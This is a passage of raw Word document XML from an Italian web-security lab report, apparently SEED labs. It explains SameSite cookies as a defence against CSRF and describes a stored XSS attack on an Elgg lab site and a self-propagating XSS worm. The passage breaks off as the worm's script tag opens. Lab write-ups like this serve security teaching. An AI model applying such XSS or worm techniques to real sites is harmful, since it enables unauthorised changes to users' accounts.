          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Same-Site: </w:t>
      </w:r>
      <w:r w:rsidR="006C1D0A">
        <w:t>richieste che vengono effettuate allo stesso sito web;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252C466E" w14:textId="6348AB07" w:rsidR="00167A94" w:rsidRDefault="006C1D0A" w:rsidP="00522E6E">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cross-Site: le richieste vengono effettuate </w:t>
      </w:r>
      <w:r w:rsidR="00522E6E">
        <w:t>da un sito web differente;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C44FB7C" w14:textId="59F84999" w:rsidR="00522E6E" w:rsidRDefault="00167A94" w:rsidP="00167A94">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00167A94">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F23D30A" wp14:editId="46AE65EF">
            <wp:extent cx="2076710" cy="1549730"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2027742715"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2715" name="Immagine 1" descr="Immagine che contiene diagramma&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId30"/>
                    <a:srcRect l="8131" t="2040" r="8781" b="3542"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2120859" cy="1582676"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A740790" w14:textId="1494CC83" w:rsidR="003D3585" w:rsidRDefault="00A45E7B" w:rsidP="00167A94">
      <w:r w:rsidRPr="00A45E7B">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Esistono due tipi di cookie </w:t>
      </w:r>
      <w:r>
        <w:t>Same-Site</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45E7B">
        <w:t>: rigorosi e non rigorosi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215797EA" w14:textId="627EEDC2" w:rsidR="00A45E7B" w:rsidRDefault="003D3585" w:rsidP="003D3585">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003D3585">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01A9405E" wp14:editId="6A50E261">
            <wp:extent cx="4150426" cy="1558635"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="4575427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2751" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId31"/>
                    <a:srcRect l="2324" t="3504" r="829" b="1382"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4170764" cy="1566273"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D07C84" w14:textId="4E24F099" w:rsidR="001976F0" w:rsidRDefault="00A2333F" w:rsidP="001976F0">
      <w:r>
        <w:t xml:space="preserve">Andiamo </w:t>
      </w:r>
      <w:r w:rsidR="0089111C">
        <w:t>quindi ad analizzare i cookies che ci vengono inviati dal server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A02C886" w14:textId="7EEF9FC0" w:rsidR="0089111C" w:rsidRDefault="001976F0" w:rsidP="001976F0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="510FA1E2" wp14:editId="7579A730">
            <wp:extent cx="5318218" cy="3616037"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="33920223" name="Immagin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223" name="Immagine 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4416" b="5913"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5330466" cy="3624365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="762763CB" w14:textId="7EF71743" w:rsidR="001976F0" w:rsidRDefault="001976F0" w:rsidP="001976F0">
      <w:r>
        <w:t>Il sito cs</w:t>
      </w:r>
      <w:r w:rsidR="00494118">
        <w:t xml:space="preserve">rflab-defense.com </w:t>
      </w:r>
      <w:r w:rsidR="00031452">
        <w:t xml:space="preserve">ci invia </w:t>
      </w:r>
      <w:r w:rsidR="00D54E4B">
        <w:t>tre cookies, uno strict, una lax e uno normal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1117B287" w14:textId="6E8951C1" w:rsidR="00272B65" w:rsidRDefault="009111B0" w:rsidP="001976F0">
      <w:r>
        <w:t>Andando a cliccare il link</w:t>
      </w:r>
      <w:r w:rsidR="00D10013">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00150E59">
        <w:t xml:space="preserve">dello stesso sito andremo ad inviare tutti e tre i cookies, mentre nel caso </w:t>
      </w:r>
      <w:r w:rsidR="00CA53B6">
        <w:t xml:space="preserve">raggiungessimo csrflab-defense.com/showcookies.php </w:t>
      </w:r>
      <w:r w:rsidR="006F39AA">
        <w:t xml:space="preserve">provenendo dal sito </w:t>
      </w:r>
      <w:r w:rsidR="00552753" w:rsidRPr="00552753">
        <w:t>csrflab-attacker.com</w:t>
      </w:r>
      <w:r w:rsidR="00552753">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F4513C">
        <w:t>verrà inviato il cookie-normal</w:t>
      </w:r>
      <w:r w:rsidR="00154E00">
        <w:t xml:space="preserve">, il cookie-lax </w:t>
      </w:r>
      <w:r w:rsidR="00A8710B">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00154E00">
        <w:t xml:space="preserve">poiché abbiamo cliccato esplicitamente sul link mentre se lo avessimo </w:t>
      </w:r>
      <w:r w:rsidR="00A8710B">
        <w:t>raggiunto tramite immagine jpg</w:t>
      </w:r>
      <w:r w:rsidR="00E72FE7">
        <w:t xml:space="preserve"> non sarebbe stato inviato</w:t>
      </w:r>
      <w:r w:rsidR="00A8710B">
        <w:t xml:space="preserve"> ) ed infine non sar</w:t>
      </w:r>
      <w:r w:rsidR="00AC7147">
        <w:t>à inviato il cookie-strict.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455598DD" w14:textId="1B9D6D60" w:rsidR="00A65D20" w:rsidRDefault="00A65D20" w:rsidP="001976F0">
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65D20">
        <w:t>e un server imposta un cookie con l'attributo SameSite su "Strict" o "Lax", può controllare se il cookie viene inviato in una richiesta cross-site verificando se il cookie è presente nell'intestazione della richiesta ricevuta. Se il cookie non è presente, il server può dedurre che la richiesta è di tipo cross-site. Questo può aiutare a proteggere da attacchi CSRF (Cross-Site Request Forgery) e fornire una maggiore sicurezza nell'applicazione web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747F5439" w14:textId="77777777" w:rsidR="00272B65" w:rsidRDefault="00272B65">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6C144C" w14:textId="77777777" w:rsidR="00272B65" w:rsidRDefault="00272B65" w:rsidP="001976F0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4031D94B" w14:textId="08764FA9" w:rsidR="003E7A1F" w:rsidRDefault="00272B65" w:rsidP="003E7A1F">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D6380C8" wp14:editId="7B3908B8">
            <wp:extent cx="3426031" cy="1650105"/>
            <wp:effectExtent l="0" t="0" r="3175" b="7620"/>
            <wp:docPr id="1502670226" name="Immagine 2" descr="Immagine che contiene testo, monitor, computer, schermata&#10;&#10;Descrizione generata automa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0226" name="Immagine 2" descr="Immagine che contiene testo, monitor, computer, schermata&#10;&#10;Descrizione generata automaticamente">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83" t="3575" r="48896" b="61254"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3454017" cy="1663584"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="003E7A1F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DDABBD2" wp14:editId="152C3F18">
            <wp:extent cx="3152899" cy="1656715"/>
            <wp:effectExtent l="0" t="0" r="9525" b="635"/>
            <wp:docPr id="465224628" name="Immagine 3" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamen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628" name="Immagine 3" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamente">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4380" t="4972" r="30083" b="25998"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3213280" cy="1688443"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F411A76" w14:textId="580E93BE" w:rsidR="008969FB" w:rsidRDefault="00E43657" w:rsidP="003E7A1F">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
      </w:pPr>
      <w:fldSimple w:instr=" SEQ Figura \* ARABIC ">
        <w:r w:rsidR="00FA611D">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="003E7A1F">
        <w:t>SAME-SITE</w:t>
      </w:r>
      <w:r w:rsidR="003E7A1F">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003E7A1F">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003E7A1F">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003E7A1F">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003E7A1F">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003E7A1F">
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figura \* ARABIC ">
        <w:r w:rsidR="00FA611D">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="003E7A1F">
        <w:t>CROSS-SITE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F89DAF" w14:textId="2AF6208D" w:rsidR="00272B65" w:rsidRDefault="00272B65" w:rsidP="001976F0"/>
    <w:p w14:paraId="0FF8486B" w14:textId="4517F5D3" w:rsidR="003E7A1F" w:rsidRDefault="004B1672" w:rsidP="004B1672">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc140165782"/>
      <w:r>
        <w:t xml:space="preserve">2.2 </w:t>
      </w:r>
      <w:r w:rsidR="0026182E">
        <w:t>XSS Attacks</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="459F6900" w14:textId="77777777" w:rsidR="00C2554F" w:rsidRDefault="00C2554F" w:rsidP="00C2554F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C2554F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Obiettivo: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C2554F">
        <w:t>inserire la frase "SAMY è il MIO EROE" nel profilo di altre persone senza il loro consenso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617BE1CF" w14:textId="49A7CE3A" w:rsidR="0026182E" w:rsidRDefault="00612601" w:rsidP="0026182E">
      <w:r>
        <w:t xml:space="preserve">Verifichiamo in prima istanza come avviene la modifica del profilo da un utente </w:t>
      </w:r>
      <w:r w:rsidR="00AB1D98">
        <w:t>del quale abbiamo accesso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CB6829" w14:textId="66B7A8F0" w:rsidR="00AB1D98" w:rsidRDefault="005819CB" w:rsidP="00287223">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="312C538E" wp14:editId="0BC4B4ED">
            <wp:extent cx="5706094" cy="2500630"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="907259406" name="Immagine 4" descr="Immagine che contiene testo, elettronica, computer, schermata&#10;&#10;Descrizione generata automaticamen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9406" name="Immagine 4" descr="Immagine che contiene testo, elettronica, computer, schermata&#10;&#10;Descrizione generata automaticament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668" cy="2518411"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25631314" w14:textId="457AE78D" w:rsidR="00287223" w:rsidRDefault="00287223" w:rsidP="00287223">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A144F34" wp14:editId="145DB19B">
            <wp:extent cx="2571008" cy="2344514"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="1806864273" name="Immagine 5" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automa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4273" name="Immagine 5" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamen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603" cy="2362383"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CB8B2B" w14:textId="714925F0" w:rsidR="008B6101" w:rsidRDefault="008B6101" w:rsidP="00DF0EA4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Vediamo quindi che la modifica avviene attraverso una post al link</w:t>
      </w:r>
      <w:r w:rsidR="00F31F08">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F31F08">
        <w:t xml:space="preserve">www.xsslabelgg.com/action/profile/edit </w:t>
      </w:r>
      <w:r w:rsidR="00750ED4">
        <w:t xml:space="preserve">. Vengono inviati diversi </w:t>
      </w:r>
      <w:r w:rsidR="00026057">
        <w:t>parametri,</w:t>
      </w:r>
      <w:r w:rsidR="00750ED4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E21533">
        <w:t xml:space="preserve">tra cui la descrizione, access-level dei diversi form, </w:t>
      </w:r>
      <w:r w:rsidR="00026057">
        <w:t>token, id ecc…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B601C1" w14:textId="77CF9BE6" w:rsidR="00026057" w:rsidRDefault="00B5642B" w:rsidP="00DF0EA4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Creiamo uno script che modifichi </w:t>
      </w:r>
      <w:r w:rsidR="00120A08">
        <w:t>all’interno del</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> profilo del</w:t>
      </w:r>
      <w:r w:rsidR="00120A08">
        <w:t xml:space="preserve"> visitatore scrivendo “SAMY is MY HERO”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C0FD77" w14:textId="285290D1" w:rsidR="00DF0EA4" w:rsidRDefault="00810A42" w:rsidP="00DF0EA4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Lo script è presente nel file: “</w:t>
      </w:r>
      <w:hyperlink r:id="rId42" w:history="1">
        <w:r w:rsidR="00BE0801" w:rsidRPr="00BE0801">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>malicius_ajax_request.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00BE0801">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00FD29BE">
        <w:t>Inserendo lo script all’interno del profilo di Samy, quando un utente visiterà tale pro</w:t>
      </w:r>
      <w:r w:rsidR="00EF549C">
        <w:t xml:space="preserve">filo verrà inconsapevolmente modificato </w:t>
      </w:r>
      <w:r w:rsidR="00970044">
        <w:t>il profilo del visitante</w:t>
      </w:r>
      <w:r w:rsidR="00EF549C">
        <w:t>, inserendo la scritta desiderata dall’attaccante. Di seguito viene mostrat</w:t>
      </w:r>
      <w:r w:rsidR="00A45365">
        <w:t>a la POST di quando Alice visita il profilo di Sami e infine</w:t>
      </w:r>
      <w:r w:rsidR="00EF549C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E711BB">
        <w:t>il termine dell’attacco dove si può verificare il corretto inserimento della stringa sul profilo di Alice</w:t>
      </w:r>
      <w:r w:rsidR="00A45365">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58331B53" w14:textId="25BA138D" w:rsidR="0014451B" w:rsidRDefault="00DF0EA4" w:rsidP="0014451B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58EFE4FD" wp14:editId="23CB0151">
            <wp:extent cx="3155468" cy="1444028"/>
            <wp:effectExtent l="0" t="0" r="6985" b="3810"/>
            <wp:docPr id="1666242281" name="Immagine 6" descr="Immagine che contiene testo, schermata, monitor, interno&#10;&#10;Descrizione generata automa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281" name="Immagine 6" descr="Immagine che contiene testo, schermata, monitor, interno&#10;&#10;Descrizione generata automaticamente">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73812" t="60321" r="6861" b="23958"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3220018" cy="1473568"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2364A3D2" w14:textId="77777777" w:rsidR="00027277" w:rsidRDefault="00027277" w:rsidP="00DF0EA4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09E7BA31" w14:textId="5BE60BEE" w:rsidR="00970044" w:rsidRDefault="00DF0EA4" w:rsidP="00DF0EA4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C5FE525" wp14:editId="12D670AD">
            <wp:extent cx="6395379" cy="2445149"/>
            <wp:effectExtent l="152400" t="152400" r="367665" b="355600"/>
            <wp:docPr id="2009481704" name="Immagine 7" descr="Immagine che contiene testo, monitor, schermata, interno&#10;&#10;Descrizione generata automaticamen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1704" name="Immagine 7" descr="Immagine che contiene testo, monitor, schermata, interno&#10;&#10;Descrizione generata automaticamente">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26626" t="7920" r="1795" b="43436"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6502730" cy="24861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8254C0" w14:textId="77777777" w:rsidR="00F07C07" w:rsidRDefault="00F07C07" w:rsidP="00F07C07"/>
    <w:p w14:paraId="24926B6B" w14:textId="12811582" w:rsidR="000A5F76" w:rsidRDefault="000A5F76" w:rsidP="00F07C07"/>
    <w:p w14:paraId="7D22D611" w14:textId="77777777" w:rsidR="000A5F76" w:rsidRDefault="000A5F76">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF170CB" w14:textId="2ACBB278" w:rsidR="000A5F76" w:rsidRDefault="002B7275" w:rsidP="002B7275">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc140165783"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.3 Self-Propagating XSS Worm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="6878E4D6" w14:textId="77777777" w:rsidR="00C102DB" w:rsidRDefault="00C102DB" w:rsidP="00C102DB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri-Bold" w:hAnsi="Calibri-Bold" w:cs="Calibri-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C102DB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri-Bold" w:hAnsi="Calibri-Bold" w:cs="Calibri-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Obiettivo: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C102DB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri-Bold" w:hAnsi="Calibri-Bold" w:cs="Calibri-Bold"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>fare in modo che l'attacco XSS si auto-propaghi (worm)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065E911C" w14:textId="76D1C4D4" w:rsidR="0030632B" w:rsidRDefault="00DF071E" w:rsidP="002B7275">
      <w:r>
        <w:t>Modifichiamo lo script visto in precedenza in maniera tale che</w:t>
      </w:r>
      <w:r w:rsidR="00215CF0">
        <w:t xml:space="preserve"> “il virus” si propaghi in cascata </w:t>
      </w:r>
      <w:r w:rsidR="009B170A">
        <w:t xml:space="preserve">andando ad inserire lo script nato dal profilo di Samy in tutti i visitatori. Facendo questo </w:t>
      </w:r>
      <w:r w:rsidR="008B5CE6">
        <w:t>anche chi visiterà il profilo di Alice (prima persona che visualizza il profilo di Samy)</w:t>
      </w:r>
      <w:r w:rsidR="00B6626A">
        <w:t xml:space="preserve"> si infetterà con lo stesso script e così via.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177DA9E7" w14:textId="4B047DA1" w:rsidR="00B6626A" w:rsidRDefault="00417FAB" w:rsidP="002B7275">
      <w:r>
        <w:t xml:space="preserve">Lo script </w:t>
      </w:r>
      <w:r w:rsidR="00E26038">
        <w:t>è presente nel file: “</w:t>
      </w:r>
      <w:hyperlink r:id="rId47" w:history="1">
        <w:r w:rsidR="00E26038" w:rsidRPr="00E26038">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>malicius_w</w:t>
        </w:r>
        <w:r w:rsidR="005C1697">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>o</w:t>
        </w:r>
        <w:r w:rsidR="00E26038" w:rsidRPr="00E26038">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>rm.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E26038">
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50151B5D"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00E0E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD700"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"worm"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
